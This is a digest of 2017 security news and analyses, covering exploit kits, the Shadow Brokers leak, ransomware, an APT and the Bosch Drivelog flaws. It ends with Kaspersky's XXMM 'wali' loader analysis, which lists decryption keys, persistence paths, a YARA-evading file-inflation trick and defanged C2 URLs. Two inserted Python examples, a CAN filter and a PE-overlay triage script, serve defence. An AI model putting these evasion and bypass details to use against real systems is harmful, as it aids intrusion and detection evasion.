“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”
Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.
Because of similarities with Sundown EK, experts at Malwarebytes initially thought that Terror EK was simply a new variant of Sundown, but further investigation revealed that it actually came from a different actor (it was dubbed Terror EK by Trustwave).
The Terror EK was advertised on various underground forums by a hacker using the online moniker @666_KingCobra, who is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).
Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader through exploits for Internet Explorer, Flash, and Silverlight.
The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.
The compromised websites are used to redirect visitors to the exploit kit landing page via a server-side 302 redirect, triggered through script injection.
“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.
Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks
16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.
The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.
Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.
They are believed stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.
"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.
They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."
The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.
Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.
In a statement on its website EastNets rejected the allegations.
"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.
"We can confirm that no EastNets customer data has been compromised in any way."
SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.
"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."
"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."
Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.
Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.
No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.
Cerber Dominates Ransomware Charts
16.4.2017 securityweek Virus
Cerber, one of the most active malware families over the past year, has increased its share of the ransomware market to 87% in the first quarter of 2017, Malwarebytes Labs reports.
The threat accounted for 70% of the ransomware market in January, but increased its presence in February and March, amid a major decrease in Locky attacks, from 12% in January to less than 2% in March, Malwarebytes’ Cybercrime tactics and techniques Q1 2017 report (PDF) reads.
While Locky has been fading away, new ransomware families such as Spora and Sage have managed to grab some market share. Cerber dominates all other threats in its category at the moment, and its market domination is on par with that of the now defunct TeslaCrypt during its most popular timeframe (the first half of 2016).
Over the past several months, Cerber’s operators used a broad range of available distribution methods, ranging from exploit kits to the recently patched Apache Struts 2 vulnerability. The Kovter click-fraud Trojan was observed dropping Cerber earlier this year, after Betabot was dropping it in September 2016.
Cerber’s authors were also focused on improving their creation with the addition of machine learning evasion capabilities, and with improved anti-sandboxing functionality. Recently, Cyphort researchers noticed that Cerber was leveraging process hollowing for infection, where a suspended process is created and the ransomware’s code is injected in it.
“Just like TeslaCrypt, Cerber has risen to the top of the ransomware market, leaving all competitors in its dust. Again, like TeslaCrypt, Cerber can just as easily become yesterday’s news. However, there are a few factors at play with Cerber that could make its future different than that of families like TeslaCrypt and Locky,” Malwarebytes Labs notes.
Cerber is available as a Ransomware as a Service (RaaS), meaning that it is readily available even to cybercriminals without coding knowledge who want to get involved in the distribution operation. What’s more, the malware features military-grade encryption, offline encryption, and various other features that make it attractive to miscreants.
The malware landscape has seen other changes as well during the first quarter of the year, such as the emergence of new macOS malware and backdoors, including a new ransomware dubbed FindZip. Researchers also discovered the first macro malware targeting Macs.
The RIG exploit kit continues to dominate its threat segment and is expected to do so in the future as well, mainly because there are only a few active toolkits, meaning that there is little competition it has to face.
Numerous malicious spam campaigns observed in the first quarter abused password-protected Office documents, in an attempt to evade auto analysis sandboxes, Malwarebytes also notes. Recently, the Ursnif banking Trojan was observed using such documents in multiple campaigns worldwide.
Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs APT
The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.
According to F-Secure Labs, the Callisto APT Group used the leaked HackingTeam surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.
The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.
F-Secure is still investigating the case; the company's experts reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.
The researchers speculate the attacker is a nation state actor:
“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”
Callisto APT group
The Callisto APT Group was involved in highly targeted phishing attacks using malware that is a variant of the Scout tool from the RCS Galileo platform developed by the surveillance firm HackingTeam.
The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.
“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”
According to F-Secure, the Callisto APT continues to be active: the experts observed the last malware sample in February 2016, and the group keeps setting up new phishing infrastructure on a weekly basis.
Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.
Facebook dismantled a huge spam campaign leveraging bogus accounts
16.4.2017 securityaffairs Social
Facebook disrupted an international spam campaign leveraging on bogus accounts used to create “likes” and bogus comments.
The security team at Facebook has disrupted an international spam operation after a six-month investigation. The company has neutralized a coordinated campaign that relied on bogus accounts used to create inauthentic likes and comments.
“Today we are taking another step to disrupt a spam operation that we have been combating for six months. It is made up of inauthentic likes and comments that appear to come from accounts located in Bangladesh, Indonesia, Saudi Arabia, and a number of other countries.” states a blog post published by Facebook.”We found that most of this activity was generated not through traditional mass account creation methods, but by more sophisticated means that try to mask the fact that the accounts are part of the same coordinated operation.”
The intent of the campaign was to deceptively grow the accounts' social networks by adding new friend connections and by liking and interacting primarily with popular publisher Pages on Facebook. The attackers then used this network of connections to send out spam messages. A huge number of bogus accounts became dormant after liking a number of Pages, “suggesting they had not been mobilized yet to actually make connections and send spam to those people.”
Systems at Facebook were able to identify the fraudulent activities and to remove a significant volume of inauthentic likes, even if attackers used tricks to avoid detection such as the traffic redirection through “proxies” that disguised their location.
“By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people.” continues Facebook.
spam campaign
As a result of Facebook's action, the company's experts expect that 99% of impacted Pages with more than 10,000 likes will see a drop of less than 3%.
Facebook confirmed security improvements to its systems to prevent abuse of its platform; social networks are today a privileged attack vector for crooks.
“We’ve found that when people represent themselves on Facebook the same way they do in real life, they act responsibly,” said Shabnam Shaik, a company security manager.
“Fake accounts don’t follow this pattern, and are closely related to the creation and spread of spam.”
Flaws in the Bosch Drivelog Connector dongle could allow hackers to halt the engine
16.4.2017 securityaffairs Vulnerability
Security experts discovered vulnerabilities in the Bosch Drivelog Connector dongle that could be exploited by hackers to stop the engine.
Security researchers at automotive cybersecurity firm Argus discovered vulnerabilities in the Bosch Drivelog Connect solution that can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus.
The Bosch Drivelog Connect is the system that provides information about the state of a vehicle, it includes the Drivelog Connector dongle.
The Drivelog Connector dongle is connected to the OBD2 diagnostics interface of the vehicle, and a mobile application communicates with it via Bluetooth.
The researchers analyzed the protocol of communication between the mobile app and the dongle and identified two potentially serious vulnerabilities.
“The vulnerabilities allowed us to stop the engine of a moving vehicle using the Drivelog platform. On February 20th, 2017, in accordance with Argus’ responsible disclosure policy, upon uncovering the vulnerabilities we informed Bosch of our findings. On February 21st, 2017, Bosch’s Product Security Incident Response Team (PSIRT) contacted Argus and began addressing the issue.” reads the analysis published by Argus.
“In summary, the following two vulnerabilities were found:
An information leak in the authentication process between the Drivelog Connector Dongle and the Drivelog Connect smartphone application.
Security holes in the message filter in the Drivelog Connector dongle.”
One of the vulnerabilities affects the authentication process between the Drivelog Connector and the Drivelog Connect mobile app. The experts have analyzed the Android version of the mobile app.
The second flaw resides in the message filter in the Drivelog Connector dongle.
According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID, but the attacker can use OEM-specific messages that pass the filter in order to have a physical effect on the car.
An attacker with root privileges on the driver’s mobile phone can leverage this message filter bypass to send malicious CAN messages outside the scope of the small subset of diagnostic messages (i.e., OBD-II PIDs) the filter is supposed to allow.
According to Argus, during the tests, its researchers managed to remotely stop the engine of a moving car by triggering the vulnerability.
Car vendors point out that this kind of attack is very hard to prevent once attackers have taken over the legitimate driver's smartphone.
Researchers from Argus went further: they devised a method to launch the attack without compromising the driver’s smartphone.
The experts discovered an information disclosure vulnerability in the authentication process between the app and the dongle that could be exploited by an attacker to connect to a targeted device without compromising the phone first.
Analyzing the authentication process, researchers discovered the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN.
The leaked data is enough to recover the PIN offline through a brute-force attack that is limited only by the number of possible PINs.
“Since, a Drivelog Dongle’s PIN has eight digits, there are 100 million possible PINs. A single verification requires a SHA256 calculation and a public key encryption operation. The calculations can be trivially parallelized – but the reality is, there’s no need: a modern laptop can run 100 million SHA256 computations and encryptions in roughly 30 minutes (according to independent benchmarks for the Ed25519 public-key signature system) using properly optimized software.” reads the analysis. “The time needed can be further reduced by running several brute-forcing servers in parallel.”
Once the connection has been established, the attacker can send malicious CAN bus messages from their own device instead of having to compromise the driver’s smartphone; the only limitation is that the attacker needs to be within Bluetooth range of the targeted vehicle.
Bosch fixed the issues by introducing two-step verification in the authentication process.
“The improper authentication vulnerability in the Bluetooth communication has been mitigated by activating a two-step verification for additional users to be registered to a device. This has been implemented on the server, so no action is required by the user. To further increase security in the authentication process an application and dongle firmware update will also be released.” states the advisory published by Bosch.
The company plans to release a firmware update for the Drivelog Connector dongle to prevent such kind of attacks.
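The message filter weakness described above comes down to what the filter checks: a service ID byte that merely "looks valid" is not the same as an allowlist of the few diagnostic requests a read-only dongle actually needs. The following added example (not Bosch's or Argus's code; the weak filter is a hypothetical stand-in for the kind of check the article describes, and the frames, the allowed PID set and the 0x31 service byte are constructed for illustration) contrasts the two approaches on ISO-TP single-frame OBD-II requests.

```python
from dataclasses import dataclass
from typing import Dict, Tuple

# Constructed example of a CAN request filter for an OBD-II dongle. Not Bosch's code.
# It contrasts a filter that only sanity-checks the service ID byte with an allowlist
# filter that admits only the read-only diagnostic requests the product needs.

OBD2_FUNCTIONAL_REQUEST_ID = 0x7DF               # broadcast diagnostic request (SAE J1979)
OBD2_PHYSICAL_REQUEST_IDS = range(0x7E0, 0x7E8)  # ECU-addressed diagnostic requests

# Allowed OBD-II services, mapped to whether a PID byte must follow the SID.
# 0x01 = show current data (needs a PID), 0x03 = read stored DTCs (no PID).
ALLOWED_SERVICES: Dict[int, bool] = {0x01: True, 0x03: False}
# Show-current-data PIDs a telematics dongle might legitimately poll (constructed subset):
# coolant temperature, engine RPM, vehicle speed, fuel level.
ALLOWED_PIDS = {0x05, 0x0C, 0x0D, 0x2F}


@dataclass(frozen=True)
class CanFrame:
    arb_id: int
    data: bytes  # 8-byte classic CAN payload carrying an ISO-TP single frame


def service_id(frame: CanFrame) -> int:
    # ISO-TP single frame: byte 0 = PCI (type nibble + length), byte 1 = service ID
    return frame.data[1]


def weak_filter(frame: CanFrame) -> bool:
    """Hypothetical filter of the kind the article criticises: it only checks that the
    SID byte lies in a broad 'valid request' range. That range also covers UDS and
    manufacturer-specific services, and the arbitration ID is never examined."""
    if len(frame.data) != 8:
        return False
    return 0x01 <= service_id(frame) <= 0xBF


def hardened_filter(frame: CanFrame) -> Tuple[bool, str]:
    """Allowlist filter: diagnostic request IDs only, ISO-TP single frames only,
    only the listed services, and for data requests only the listed PIDs.
    Returns (allowed, reason) so that drops can be logged."""
    if len(frame.data) != 8:
        return False, "bad frame length"
    if frame.arb_id != OBD2_FUNCTIONAL_REQUEST_ID and frame.arb_id not in OBD2_PHYSICAL_REQUEST_IDS:
        return False, f"arbitration ID 0x{frame.arb_id:03X} is not a diagnostic request ID"
    pci_type, pci_len = frame.data[0] >> 4, frame.data[0] & 0x0F
    if pci_type != 0:
        return False, "only ISO-TP single frames are accepted"
    sid = service_id(frame)
    if sid not in ALLOWED_SERVICES:
        return False, f"service 0x{sid:02X} is not an allowed OBD-II service"
    expected_len = 2 if ALLOWED_SERVICES[sid] else 1
    if pci_len != expected_len:
        return False, f"service 0x{sid:02X} request must carry {expected_len} payload byte(s)"
    if ALLOWED_SERVICES[sid] and frame.data[2] not in ALLOWED_PIDS:
        return False, f"PID 0x{frame.data[2]:02X} is not on the allowlist"
    return True, "ok"


# Constructed test frames (not captured traffic).
RPM_REQUEST = CanFrame(0x7DF, bytes([0x02, 0x01, 0x0C, 0, 0, 0, 0, 0]))   # service 01, PID 0C
DTC_REQUEST = CanFrame(0x7DF, bytes([0x01, 0x03, 0, 0, 0, 0, 0, 0]))      # service 03
# A request using a non-OBD-II service byte (0x31 is in the UDS range); chosen only as an
# example of a service a read-only dongle has no reason to forward.
OEM_RANGE_REQUEST = CanFrame(0x7E0, bytes([0x04, 0x31, 0x01, 0x00, 0x00, 0, 0, 0]))
# A well-formed "service 01" payload aimed at a non-diagnostic arbitration ID.
NON_DIAG_ID_FRAME = CanFrame(0x0C9, bytes([0x02, 0x01, 0x0C, 0, 0, 0, 0, 0]))


if __name__ == "__main__":
    for name, frame in [("RPM_REQUEST", RPM_REQUEST), ("DTC_REQUEST", DTC_REQUEST),
                        ("OEM_RANGE_REQUEST", OEM_RANGE_REQUEST), ("NON_DIAG_ID_FRAME", NON_DIAG_ID_FRAME)]:
        allowed, reason = hardened_filter(frame)
        print(f"{name:18} weak={weak_filter(frame)!s:5} hardened={allowed!s:5} ({reason})")
```

Run stand-alone, the script shows the weak filter passing all four frames while the allowlist filter passes only the two genuine OBD-II requests and reports why the other two were dropped. The design point is the one Argus's finding illustrates: a filter on a safety-relevant bus should enumerate what is permitted rather than reject what is known to be bad.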
The security is still secure
16.4.2017 Kaspersky Safety
The WikiLeaks report and Kaspersky Lab's products
Recently WikiLeaks published a report that, among other things, claims to disclose tools and tactics employed by a state-sponsored organization to break into users’ computers and circumvent installed security solutions.
The list of compromised security products includes dozens of vendors and relates to the whole cybersecurity industry. The published report includes a description of vulnerabilities in software products that can be used to bypass protection and jeopardize users’ security.
Customers’ security is a top priority for Kaspersky Lab, and as such we take any information that could undermine users’ protection very seriously. We thoroughly investigate all reported vulnerabilities.
The published report contains descriptions of two vulnerabilities in Kaspersky Lab’s products that have already been fixed. It also includes a number of mentions related to the company’s technologies and past Advanced Persistent Threat (APT) research. I’d like to take this opportunity to address possible concerns regarding the report and provide reliable first-hand information to demonstrate that no current Kaspersky Lab products and technologies are vulnerable.
Vulnerabilities in security solutions
First of all, I’d like to emphasize that the vulnerabilities in Kaspersky Lab’s products listed in the report are related to older versions of the products, and they were publicly disclosed and fixed some time ago. The current versions of our products are not vulnerable to the tools and tactics listed.
The “heapgrd” DLL inject vulnerability was discovered and fixed in Kaspersky Lab products back in 2009. The vulnerability allowed a malefactor to load a third-party DLL instead of the WHEAPGRD.dll file and thus bypass protection. It was patched starting with Kaspersky Internet Security 9 and Kaspersky Antivirus for Workstations MP4. The products that were mentioned in relation to these vulnerabilities (Kaspersky Internet Security 7 and 8 and Kaspersky Antivirus for Workstations MP3) are outdated and no longer supported. All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release.
The TDSS Killer’s DLL inject vulnerability mentioned in the WikiLeaks report was fixed in 2015.
Product behavior specifics
The report also says Kaspersky Lab’s security solutions do not block DLL injections into user processes and svchost.exe. In fact, we do protect against this sort of attack — in a smarter way that elegantly combines protection and a better user experience.
Nowadays, it’s common practice for legitimate applications to inject their code into user processes. To effectively distinguish legitimate from malicious actions, track changes, and restore unwanted amendments an application may make to the system, Kaspersky Lab’s products have included the System Watcher component since 2011. System Watcher monitors all processes on a device, including svchost.exe, and is capable of detecting malicious behavior, blocking it, and rolling back malicious changes.
The report also describes several tools and malicious programs that were used to collect data and infiltrate the users’ computers. However, all of them can be neutralized with Kaspersky Lab’s products. Let’s take a closer look at them.
First, the RickyBobby fileless Trojan is allegedly not detected by Kaspersky Lab’s products, which is not the case. All personal and enterprise level products can detect this Trojan, prevent the infection, and disinfect a system that was protected by a third-party or outdated security solution.
Second, the report mentions two other malware samples (Fine Dining and Grasshopper) that allegedly are not detected by Kaspersky Lab’s products. However, the report doesn’t provide further details of the malware. We will keep investigating the issue and report the findings as soon as details are available.
That said, we are skeptical: It’s said Fine Dining relies on the aforementioned DLL inject vulnerability in TDSS Killer, which is already fixed. Also it’s worth mentioning that Kaspersky products provide multiple layers of protection — such as emulation, heuristics, System Watcher, and Automatic Exploit Prevention — including those powered by industry-leading machine learning. These technologies are capable of detecting cyberthreats proactively based on their behavior and are constantly improved to address new techniques employed by malicious actors. The analysis of the report makes us optimistic that our customers are already protected against both Fine Dining and Grasshopper.
Third, the report mentions HammerDrill, API Memcry, and Trojan Upclicker, which use a variety of techniques to try to avoid detection by the emulator technology.
Kaspersky Lab’s emulator’s history dates back to the early 90s. It’s rated one of the best in the cybersecurity industry, and it’s continuously improved. The functionality to address the described Trojan Upclicker cloaking method was included in the emulator more than a year ago, for example. The other two tools are effectively managed by the multilayer protection available in Kaspersky Lab’s products both for home users and enterprise customers.
Fourth, the report mentions an MBR File Handle component that is able to circumvent security solutions’ drivers and thus upload malware into the Master Boot Record of the operating system.
In fact, this trick is foiled by the antirootkit technology included in Kaspersky Lab products, which enables them to reliably detect and remove infections — even the most advanced bootkits.
Fifth, another tool mentioned in the report is the Bartender program, which collects data on installed software. This functionality is not malicious and is used by many legitimate applications. However, Kaspersky Lab’s products do provide protection against such activity should a user select the high security level setting.
Fun facts
The other two mentions of Kaspersky Lab in the context of malware creation are actually fun facts.
First, the tool called DriftingShadows checks if Kaspersky Lab’s products are installed on the device, and if it finds them, it does … nothing. This means that the malware creators failed to sneak past our products. They now avoid protected devices so that their malware doesn’t get caught.
Second, the documents also describe a game called “Bonus: Capture the Flag” played among malware creators. It involves attempts to create a malware sample that bypasses Kaspersky Lab’s protection. In other words, malefactors consider our products a gold standard of cybersecurity.
Wrap-up
Investigating the existing report thoroughly, we found two vulnerabilities and several other mentions of Kaspersky Lab, including discussions regarding our reports on the Duqu 2.0 and Equation cyberespionage campaigns. Both vulnerabilities were fixed quite some time ago and pose no threat to our customers. The same goes for the other malicious tools and techniques mentioned.
However, we are staying vigilant and continuously monitoring the situation. WikiLeaks may yet publish more details. In any case, we’d like to reassure customers that addressing any possible vulnerabilities will be our top priority.
No development process guarantees immediate, perfect, permanent invincibility. We are committed to constantly improving the development process, and we also make significant efforts to perfect the process of fixing newly discovered vulnerabilities.
Old Malware Tricks To Bypass Detection in the Age of Big Data
16.4.2017 Kaspersky Virus
Kaspersky Lab has been tracking a targeted attack actor’s activities in Japan and South Korea recently. This attacker has been using the XXMM malware toolkit, which was named after an original project path revealed through a pdb string inside the file: “C:\Users\123\documents\visual studio 2010\Projects\xxmm2\Release\test2.pdb”. We came across an unusual technique used by a sample which contained no pdb strings but was very similar to a variant of XXMM malware in terms of code similarity, malware functionality, crypto-algorithm, data structures and module configuration.
The malware sample we observed was named “srvhost.exe” to resemble a standard system process name. It came from one of our partners at the beginning of 2017. One of its most surprising features was its file size, which is not commonly seen in malware: it was over 100MB. According to our analysis, this malware is a Trojan loader component that activates a backdoor. We could not confirm pdb strings from this malware; however, the backdoor module seems to be named “wali” by the author, according to strings from the embedded config block.
Fig. config strings with “[wali]” section
Fig. “wali.exe” name in the malware body
The wali loader decrypts the embedded wali backdoor using the “\x63” byte and a simple XOR operation. “\x63” is not the only XOR key; we confirmed others. The loader then injects the wali backdoor module into the memory of the iexplore.exe process.
What is inside the wali loader that makes it so big? The reason is that this sample carries a very big overlay of junk data. We found more than 20 other similar samples (wali loader + overlay) using open source intelligence and by searching our malware collection with a YARA rule. After removing the overlay, only six unique samples remained.
md5_payload                       md5_payload+overlay               size (bytes)
d1e24c3cc0322b22988a1ce366d702e5  8bd0ddeb11518f3eaaddc6fd82627f33  105982049
e4811950899f44f9d14a786b4c5b1faa  2871ec229804a6e872db55dafa5c9713  105997178
                                  3e24710d7ade27316d367dd8cb2a0b1a  105996860
                                  3e9feea893482b65a68b1feecb71cd4d  105997043
                                  558ca7fa8ed632fa4f8c69e32888af0f  105997191
                                  d11f7b25823ce474e30e8ab9c8d567b0  105996847
                                  f4c3f06faf53ad2bbc047818344a2323  105997181
                                  f7cc6a5a06cd032c6172d14c1568b976  105997102
e7492f11c88d32e1e0b43f6b29604ec8  6a5558e4ab530f9b5c2d5bcc023d3218  105997658
                                  bb8cef31cf6211c584d245be88573e1f  105997755
Table. Some samples of 100M+ bytes wali loader + overlay (a blank md5_payload cell shares the payload of the row above)
The overlay data is generated by the wali dropper when the wali loader is installed onto the victim’s machine. The following figure shows the structure of malware components and how they are related to each other:
Fig. Structure of wali modules
Wali dropper1 checks the CPU architecture. If the CPU is 64-bit, this malware decrypts the 64-bit version of the wali loader from resource id 101. Otherwise, it decrypts the 32-bit version of the wali loader from resource id 102. To extract the resource data it uses RC4 with “12345” as the key, and then LZNT1 to decompress the data. Dropper1 creates a file named “win${random4 chr}.tmp.bat” in the current temp directory from the decrypted wali dropper2 data. Finally, it appends generated garbage data to the overlay of the dropped file and runs wali dropper2.
Wali dropper2 checks if the user account has admin privileges, decrypts the wali loader using the same algorithm and the same key as dropper1, and creates new files at the following paths:
%ProgramFiles%\Common Files\System\Ole DB\srvhost.exe
%appdata%\Microsoft\Windows\Start Menu\Programs\srvhost.exe
It also appends generated garbage data to the overlay, using the same function. Finally, it creates a registry value named “sunUpdate” in “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” to ensure malware persistence.
Generation of Junk Data
The feature of appending junk data to the malware executable to inflate the file size is quite unique to wali dropper1 and wali dropper2. We assume that by creating a large file the authors wanted to avoid AV detection, complicate sample exchange and stay below the radar of the most commonly used YARA rules. The function that generates the junk data is shown below:
Fig. Function to create junk data (create_garbage_data).
The create_garbage_data function generates a random byte in a loop with 1,000 iterations. In every iteration it fills blocks of data of random length within certain dynamically calculated limits. After that the result of create_garbage_data is written to the overlay of the decrypted wali loader and the process is repeated 100 times. This produces junk data of ~100MB which is appended to the executable.
Fig. Loop to append the junk data to overlay.
The size of one wali loader (MD5: d1e24c3cc0322b22988a1ce366d702e5) was initially 1,124,352 bytes. The function that appends garbage produced a new malware file in a real attack (MD5: 8bd0ddeb11518f3eaaddc6fd82627f33) and the file size was increased to 105,982,049 bytes.
As the appended junk data is created dynamically and depends on random values, the size of it may vary. We have seen 100MB files as well as 50MB samples used in real world attacks. The largest we observed was a 200MB malware sample created with the same trick. This technique currently doesn’t affect detection of the malware by Kaspersky Lab products. The malware is detected as:
Trojan.Win32.Xxmm
Trojan.Win64.Xxmm
Trojan-Downloader.Win32.Xxmm
Trojan-Downloader.Win64.Xxmm
Trojan-Dropper.Win32.Xxmm
Trojan-Dropper.Win64.Xxmm
Inflating file size with garbage data is not a completely new technique. Previously, polymorphic viruses and worms used this technique a lot to mix original code with garbage data spread across the malware file, sometimes increasing the file size by hundreds of kilobytes or even megabytes. Certain software protectors may also insert decoy files into packed files and inflate the file size up to 1MB. We have also seen executable malware disguised as movie files and ISO files spread over torrents; in these cases the malware size is inflated to a few gigabytes in order to mimic genuine content.
What is quite unique about this use of appended junk data is that here the technique is used in targeted attacks and is applied after the initial infection, during the later phases of the attack, with the intention of increasing file size to avoid detection.
While this technique may seem primitive and inefficient as a way to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives. The reason is that a common practice among YARA rule authors is to limit the size of scanned files, mainly to improve scanning performance. Large files, like the ones produced by XXMM malware, may become invisible to such rules, which is why we recommend that security researchers consider this when creating rules for dropped malware.
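The two practical consequences of the junk-data trick described above (the payload hash differs from the on-disk hash, and size-capped YARA rules skip the file) can both be handled by triaging on the PE image without its overlay. The following Python script is an added example written for this page, not Kaspersky Lab's code and not the malware's routine: it parses the DOS/PE headers, computes where the last section's raw data ends (everything after that offset is overlay), reports the payload hash next to the whole-file hash, and flags files whose overlay dwarfs the executable. The minimal PE fixture and the junk generator are constructed test inputs; the generator only loosely mimics the random-length-block behaviour the article describes.

```python
import hashlib
import random
import struct


def build_minimal_pe(section_bytes: bytes) -> bytes:
    """Construct a tiny, non-executable PE32 image (test fixture, not a real sample)."""
    raw_ptr = 0x400                      # first section's raw data starts here
    size_opt = 0xE0                      # PE32 optional header size
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x102)      # i386, one section
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)                 # PE32 magic, rest zeroed
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(section_bytes), 0x1000,
                       len(section_bytes), raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = (dos + b"PE\0\0" + coff + opt + sect).ljust(raw_ptr, b"\0")
    return header + section_bytes


def overlay_offset(data: bytes) -> int:
    """Offset where the overlay starts: the end of the last section's raw data."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_opt                     # section table follows the optional header
    end = table + 40 * num_sections                  # never cut inside the headers themselves
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))                       # a truncated file has no overlay


def append_junk(pe: bytes, target_bytes: int, rng: random.Random) -> bytes:
    """Inflate a file with pseudo-random overlay blocks (constructed stand-in for the dropper's routine)."""
    out = bytearray(pe)
    added = 0
    while added < target_bytes:
        block_len = min(rng.randint(256, 4096), target_bytes - added)
        out += bytes(rng.getrandbits(8) for _ in range(block_len))
        added += block_len
    return bytes(out)


def analyse(data: bytes, ratio_threshold: float = 10.0) -> dict:
    """Split a PE into payload and overlay and report the values a triage rule would key on."""
    off = overlay_offset(data)
    payload, overlay = data[:off], data[off:]
    return {
        "file_size": len(data),
        "payload_size": len(payload),
        "overlay_size": len(overlay),
        "md5_full": hashlib.md5(data).hexdigest(),        # what the table's "payload+overlay" column shows
        "md5_payload": hashlib.md5(payload).hexdigest(),  # stable across re-inflated copies
        "inflated": len(overlay) > ratio_threshold * len(payload),
    }


# Constructed inputs: a clean 1.5 KB image and the same image padded with 300 KB of junk.
CLEAN_PE = build_minimal_pe(b"\xC3" * 0x200)
INFLATED_PE = append_junk(CLEAN_PE, 300_000, random.Random(7))

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PE), ("inflated", INFLATED_PE)):
        r = analyse(blob)
        print(f"{name:9s} size={r['file_size']:8d} overlay={r['overlay_size']:7d} "
              f"md5_payload={r['md5_payload']} inflated={r['inflated']}")
```

The payload hash is the one worth sharing and pivoting on, since every copy the dropper writes gets a fresh overlay and therefore a fresh whole-file hash. For YARA, the same finding argues against a blanket `filesize < N` condition in rules meant for dropped executables; if scan time is a concern, bound the string search to the header region instead of excluding large files outright.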
Indicators of Compromise
SHA256sum of samples
Wali dropper1:
9b5874a19bf112832d8e7fd1a57a2dda180ed50aa4f61126aa1b7b692e6a6665
Wali dropper2:
da05667cd1d55fa166ae7bd95335bd080fba7b53c62b0fff248ce25c59ede54a
10fca84ae22351356ead529944f85ef5d68de38024d4c5f6058468eb399cbc30
Wali loader + overlay:
Wali loader:
a24759369d794f1e2414749c5c11ca9099a094637b6d0b7dbde557b2357c9fcd
b55b40c537ca859590433cbe62ade84276f3f90a037d408d5ec54e8a63c4ab31
c48a2077e7d0b447abddebe5e9f7ae9f715d190603f6c35683fff31972cf04a8
725dedcd1653f0d11f502fe8fdf93d712682f77b2a0abe1962928c5333e58cae
cfcbe396dc19cb9477d840e8ad4de511ddadda267e039648693e7173b20286b1
C2 (compromised web sites) of wali:
hXXp://******essel[.]com/mt/php/tmpl/missing.php
hXXp://******essel[.]com/mt/mt-static/images/comment/s.php
hXXp://******hi[.]com/da******/hinshu/ki******/ki******.php
